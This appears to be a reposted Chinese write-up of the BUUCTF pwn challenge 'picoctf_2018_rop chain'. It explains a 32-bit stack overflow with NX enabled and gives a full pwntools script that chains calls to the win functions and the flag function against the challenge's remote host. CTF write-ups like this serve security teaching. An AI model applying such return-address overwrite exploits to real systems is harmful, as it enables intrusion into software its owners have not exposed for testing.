32位，開啟了NX保護

利用思路

首先溢出后覆蓋ret為function1函數(shù)地址，將win1賦值為1，之后跳轉(zhuǎn)到function2的地址，a1是傳入的參數(shù)，將a1傳入即可滿足條件去設(shè)置win2的值為1，之后去執(zhí)行flag函數(shù)，if要滿足的條件之前都設(shè)置好了，可以直接讀出flag

from pwn import * r = remote("node3.buuoj.cn", 26602) win_function1 = 0x080485CB win_function2 = 0x080485D8 flag = 0x0804862B payload = "a" * (0x18+4) payload += p32(win_function1) payload += p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD) r.sendlineafter("input> ", payload) r.interactive()

總結(jié)

以上是生活随笔為你收集整理的Buuctf(pwn) picoctf_2018_rop chain 栈溢出的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。